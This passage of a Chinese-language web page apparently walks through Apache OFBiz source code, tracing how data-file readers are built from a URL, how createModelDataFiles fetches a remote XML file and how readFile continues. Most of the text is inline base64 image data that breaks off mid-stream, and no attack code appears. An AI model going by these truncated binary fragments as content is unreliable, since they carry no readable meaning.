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
<p blockindex=21>先从readers里面读取,如果没有的话就根据传入的url来创建一个</p>
<p blockindex=22><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3IAAACdCAYAAADxLUorAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOy9Z5QdV37g97u3ql7u7tcBnRMajUYmQALgkAQBpmGYYZAmKo6kla2wOt61P3hlHR9/8PF+8Kf1B3vt3XOstfZoZXlGGo000iRN4HAIMBNEzt1A5xxev365qu7fH+p1o5FIAIyQ6nfY6OZ7VbduqnvvP9z/Vffv3S/cY2it6Whr5fLlIUTuuexfiwjGGERrLKXu4D6DiWxgYHsfddlBzo4tUfDgxhQUdqSZTXs30Rxx0GuPNRjfgGVjrb/JzTE3McSFoQKpzk6aa4tMXRxlWZx11wkiKTp29BJbmWJqfJ6iaEJCQkJCQkJCQkJCPhnsTzsD/6wxBpVsoqu1mUhulKHZPPo2hTkxPnWtPXQ0NBFt1bTlTjE8l8dH3SDMaStCstYwf/IiGREETSTZSFtPK2b8JGMrCgRMpIYNLU001MbQdo6SERLpTezcEeHC4GUWSrqatiBiEa9Lk/IXmEWqArVa/S8kJCQkJCQkJCQk5GMkFOQ+DcRgVIy6jk3s3NFF2hSZuDSJEdC3IQWJGKwN29m6KUFm6Di5DTvoaGthfHEYzzOoG4RBg+fmWJiYZEYMgiZWp0g212Pmx5mYt1AIXrQBnaih3gbEpTg3whlPsX1LKxvbfFKmltb+FpK+j2ARScTRNTtoaB3AoIBlLh89x1S2hKtvFChDQkJCQkJCQkJCQj4aQkHuE0dQ8Xq6ejbRbs8zOjiG39GCcJsuomKQmk727OxEz1zgyuQk+WkPe9dmdvcscnJ0mZILNxr21LrPFKoqMSp1VeBa/UuMwUpuYGN7Myo7zplj08QxeCrDSn4GSwxGUnTs7CWenWJyfJ6iWKBcikUXX4VCXEhISEhISEhISMjHSSjIfeIoxC2wODHIir9COdpJY0vrbfkjiggSaaZ/cx/JlUHOjUyR9QCZY/higp379tDvvcul8RXKvl4T3EQ0TqSF7Qcfpb8qL2o7SjQehV2HaHSrApx2iEUMhUnQFQ9x6ujdmcA5f5HB0SV8rcjnBBDEVEiXO6CwzOL8LCvGQqFQWt+WVTEkJCQkJCQkJCQk5O4JBblPA9+lmHMpGJ94IhC4PsgeJ8bDr+1h/56d1OYvcvL8MIumgx0PduCPnOPKzBgnTsTZe98+tvpvcGq8hC+BUKUQXHeBK8cvMV91rYymWuga6MJcOcblJQ0IfqSOtq4O2i2N52YYu3icitlOe1s3zYsLTOSuCodU86xg3a48QYxBLB1a5EJCQkJCQkJCQkI+RkJB7h5AjKGucyd9fQ14Y6c5NTXFUlmQhE08kcC1NVp5lBYHOXOszKYdD/BI3SjHBmcoVHxUIkZcXKazWbJiECxiqo6KZzCFLNlsVZCLOqTLBuUAYvDdArOXz5GN2CQat/LAng7Sto8voJRDvCaGqt1BunkAQ+DOabkznDs9ylyujNxJFM6QkJCQkJCQkJCQkNsmFOQ+44gxpLr3sKPNYnroNKPTWXwT2MIUYIywegKDxiW3PMLZ92ap676P+3fFOPHeFVylsFBoS2MZhcHCsgLrmlYay7KCvXfVz66e6GCRau6htyXC8sgFzh2bxNaC7zlsGNjOLnuFi+cHGV8qY636U4pHpeKFQlxISEhISEhISEjIx0goyH3GUVpRnLnI8XlDpVzBM0GAkpv7YirAp1LMMX/5GHnbpyQQwcKJtrHr8Sa2iSAotGXjRCOw5yla/Ort2saxXFYmgsTFTpBuqCFpZZnI5imVFUoMTtMWmhIeI5cGGZvOUEGhJDiCQKqBVEIxLiQkJCQkJCQkJOTjIxTkPvMoTKVIofr3Bxu6qte4RQouKKVJ1tfhLI9y/MQYhaqwFa1ppXtzFzL8JoOLwWHeZnWPnFKICE4yRV1c42YWWC6B1gpizfRt2oBTmOTK9CJFu5mtu1phYozx6WVKYaSTkJCQkJCQkJCQkI+dUJC7F7ibcP4qsJIppUglk0hujPl8DiMAGt8u4xqDKebJ56t75LwIJdegbEBsEsk64tols5ShrBTKpOjs20yDzDI8PMyyp7HVAhOzbezfvZ2IOsOF6SxeePxASEhISEhISEhIyMdKKMh9miiFGB/PrWB8uSvhR6lbW+lE2Vi1fbTV5Rk5ORfsfasKWcF9wY+2I0QdjR+NEbE1YnwkkqImXYuuLLGYKWLsRjZt28FAU4UrF+fJeDEiTpL2Lb20tzQS1ZqOgT4yhfNMZ0uYcI9cSEhISEhISEhIyMdGKMh9iiilKS9NcO69SQRzNWDI7SIG3/fxzc2PE1eWRXJDM9HFYYZXvGsseyIG3/PwJUpt2zb27u4kKgqTn2fk7CJ+YgM1SZtyJsNyUUFtjFg8QqKmnoHdTWwGLCfH8NGzHDt9jJISGvsfpKshRrZUJFtR4XlyISEhISEhISEhIR8T6v69+z/oCLPPHFprOtpauXx5CJF7LvvXIddYyu4IpbFtC/G9aiTLGy5AWTY2Pq5vbrjXsiwwHqJsbEejhMBC6HkYrn7v+wbRFrZlYWvFqglQIXiui+sZRAnaimCrqmB5rzdLSEhISEhISEhIyGeY0CL3qXM7AUxugRi8is+tExDEr+DeTEQUg++u3utS9q5KXkopwOB7PqCq++0MvmfwrpPQlFqNUqnAeHh3WZSQkJCQkJCQkJCQkNsnFOTudT5QCnyf79fdq26azo2f3fy6kJCQkJCQkJCQkJBPEv1pZyAkJCQkJCQkJCQkJCTkzggFuZCQkJCQkJCQkJCQkHuMUJALCQkJCQkJCQkJCQm5xwgFuZCQkJCQkJCQkJCQkHuMUJALCQkJCQkJCQkJCQm5xwgFuZCQkJCQkJCQkJCQkHuMUJALCQkJCQkJCQkJCQm5xwgFuZCQkJCQkJCQkJCQkHuMUJALCQkJ+dQQRD7tPIR8VpCwM4SEhISE3AGhIBcSEhLyiSMY30dwiEQd1KednZBPH+0Qi1qI72FMKNCFhITcBBGM7+K5Lp7nh4rAEOxPOwO3w620lCJy0++U+ue1LBIBz4ClQd+i6MaAt1ZXCqXA1rzvAlIEfBFAYX3AtR8KEVzP4KOwLI2jg7b1PIOpfmZ/WJWDCBVPUNX0bxffN1R8qZZdobXCsdWNdVHNr7fWHYNrbUvdsk1uB2MEqdb/XSOC6wv+TRaH2tLY+sY8+p7BCChbY6/7zlTrI0CBgoij71ojJEbwfMO1SQZt/rH2uRsyIni+YLhF+36kjxKUjtHQt51N3U3ozHmOnRzFUwrE4Ps+KAtrtdGrn0n1MwVgfHzfxwSvJ8E7rdCWhb5m/BN8z0O0jf1hOuJnikAINqKwbOtjaCtBfA9f9Lr0BTE+vgFt20F/ry6o/HWvlUKjLAutr+1Dxncxoqvtc7NnGnSyjz0P9+LNDjN88RJzeYNSH+4dEIHV7N3suSLgSfCd9U+le9wMEYzx8H35gPflTpMNxkmt9d2302rerh+fBdAW1k36jBgfYwxo+5q+JsbD9w1XU9JYtv0h5iDB+Ovr7Sqqmrd7pduICepFfWBbCcbzg2utD1N3HxM6Rl1nH52t9URYZvTkWZbcUJr758w9Icg5to1lWUjVDcnSCmMMsVjsGkFOKYXv+7iu+ynm9pNFgHhKszkpTMwLSwZueKUVNDRodqSq9wjky8LQvLDCzRcKIhCPKfoaNHZJuLwsrJiPfmEtApFolJ176umyfK5cXuDMopBIxdm6JU2bX2FoJMP5jPlQCw2vpoZDGyMsjy5zadnH5QPKIqAiNj199exvtfGNIOKzsJDj1KUi2XULLBEhkoqzrbuOTXWBUGQ8n4WFPBfGCyyUQN2NpKMU6YY4teIysezd2K63gYhgpRI80F3DxrRmfamVguxMhqOjRTKVdQs9pena0sT2tDB+aYnBFYMrwfUtGzfwUEcEhSDGUCwWeO9UjoUb5/nbyls0neL+7hRdNQpQKPHJr5QZGs0xuuLj8wkIcyKYaIxdG5PUlYqcHimwwsckzImg7Bq
<p blockindex=23>这里<code>createModelDataFiles</code> 方法里面就去远程读取xml文件</p>
<p blockindex=24><img src="data:image/png;base64,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
<p blockindex=25>xml文档的示例在<a href=https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz%27s+Data+File+Tools></a><a href="https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz's+Data+File+Tools">https://cwiki.apache.org/confluence/display/OFBIZ/OFBiz's+Data+File+Tools</a></p>
<p blockindex=26>后续就是对xml文档的解析,然后返回这个xml文档的句柄 <code>reader.getDataFileNames()).iterator()</code> 得到该xml文档data-file属性的迭代对象</p>
<p blockindex=27>进入readFile方法</p>
<p blockindex=28><img src=data:image/png;base64,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
<p blockindex=29>这里第一步就是重复上面的步骤,返回一个xml文档的DataFile对象</p>
<p blockindex=30>回到readFile</p>
